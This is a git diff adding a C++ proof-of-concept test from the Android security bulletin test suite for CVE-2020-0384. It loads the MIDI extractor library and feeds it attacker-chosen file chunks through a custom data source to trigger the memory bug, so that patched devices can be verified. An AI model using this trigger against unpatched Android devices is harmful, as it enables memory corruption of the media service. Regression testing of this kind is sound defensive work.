diff options
Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp')
| -rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp | 129 |
1 files changed, 129 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp new file mode 100644 index 00000000000..43da25d3c3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} |